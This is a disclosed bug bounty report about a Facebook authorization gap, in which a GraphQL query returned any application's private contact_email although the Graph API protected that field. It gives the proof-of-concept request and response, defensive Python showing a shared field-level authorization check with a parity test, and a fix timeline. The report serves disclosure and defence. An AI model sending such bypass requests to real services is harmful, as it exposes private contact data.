Disclose contact_email of any Facebook application
In the Facebook developer application dashboard there is a field "contact_email", which is meant to be private and used for communication between the app admin/developer and Facebook.
Access to this field through the Graph API was properly restricted, but by rewriting the same query as a GraphQL call I was able to retrieve the contact email address of any Facebook application.
Proof of concept
Request:
POST /graphql
Host: graph.facebook.com
q=nodes(35xxxxx28){name,contact_email}
Response:
{
  "35xxxxx28": {
    "name": "Facebook Application Name",
    "contact_email": "contact@company.com"
  }
}
Impact
This could have allowed a malicious user to read the contact_email of any application through GraphQL, even though the same field was protected on the Graph API.
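The root cause described above is an authorization check that lives in one API surface (Graph API) but not in a second surface (GraphQL) that reads the same record. The following is an added illustration, not code from the original report or from Facebook, of why field-level authorization belongs in a single resolver shared by every surface. The `App` record, the `APPS` store, the admin identifiers and the `35xxxxx28` sample id are all constructed for the example; `rest_get_field` / `graphql_nodes` are hypothetical stand-ins for the two endpoints.

```python
# Added illustration (not Facebook's code): field-level authorization must be
# enforced in one place that every API surface goes through, otherwise a newer
# surface can silently bypass the rule the older one enforces.
# All records, ids and admin names below are constructed sample data.

from dataclasses import dataclass


@dataclass(frozen=True)
class App:
    app_id: str
    name: str
    contact_email: str          # visible only to the app's own admins
    admins: frozenset           # viewer ids allowed to see private fields


# Constructed sample store keyed by application id.
APPS = {
    "35xxxxx28": App("35xxxxx28", "Sample Application",
                     "contact@example.com", frozenset({"admin-1"})),
}

PUBLIC_FIELDS = {"name"}
PRIVATE_FIELDS = {"contact_email"}


class Forbidden(Exception):
    """Raised when a viewer asks for a field they may not read."""


# --- Vulnerable layout: each surface does (or forgets) its own check --------

def rest_get_field_vulnerable(viewer, app_id, field):
    """First surface: the rule is enforced here, so private fields are safe."""
    app = APPS[app_id]
    if field in PRIVATE_FIELDS and viewer not in app.admins:
        raise Forbidden(field)
    return getattr(app, field)


def graphql_nodes_vulnerable(viewer, app_id, fields):
    """Second surface added later: reads the record directly with no check,
    so the protection applied by the first surface is bypassed."""
    app = APPS[app_id]
    return {f: getattr(app, f) for f in fields}


# --- Hardened layout: one resolver, reused by both surfaces -----------------

def resolve_field(viewer, app, field):
    """Single authorization point consulted by every API surface."""
    if field in PUBLIC_FIELDS:
        return getattr(app, field)
    if field in PRIVATE_FIELDS:
        if viewer in app.admins:
            return getattr(app, field)
        raise Forbidden(field)
    raise KeyError(field)       # unknown fields are rejected, never leaked


def rest_get_field(viewer, app_id, field):
    return resolve_field(viewer, APPS[app_id], field)


def graphql_nodes(viewer, app_id, fields):
    """GraphQL-style multi-field read: a denied field becomes null, the rest
    of the selection is still returned."""
    app = APPS[app_id]
    result = {}
    for f in fields:
        try:
            result[f] = resolve_field(viewer, app, f)
        except Forbidden:
            result[f] = None
    return result


def surfaces_agree(viewer, app_id, field, rest_fn, graphql_fn):
    """Parity check worth keeping as a regression test: both surfaces must
    expose exactly the same value (or non-value) for a given viewer/field."""
    try:
        via_rest = rest_fn(viewer, app_id, field)
    except Forbidden:
        via_rest = None
    return via_rest == graphql_fn(viewer, app_id, [field])[field]


if __name__ == "__main__":
    anon = None
    print("vulnerable parity:",
          surfaces_agree(anon, "35xxxxx28", "contact_email",
                         rest_get_field_vulnerable, graphql_nodes_vulnerable))
    print("hardened parity:",
          surfaces_agree(anon, "35xxxxx28", "contact_email",
                         rest_get_field, graphql_nodes))
```

The parity check is the practical takeaway: when a second read path is added over the same data, a test that compares what an unprivileged viewer gets from each path for every private field catches exactly this class of gap before it ships.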
Timeline
- 21 Nov, 2018 – Report Sent.
- 28 Nov, 2018 – Triaged.
- 29 Jan, 2019 – Fixed.
- 12 Feb, 2019 – Bounty Awarded.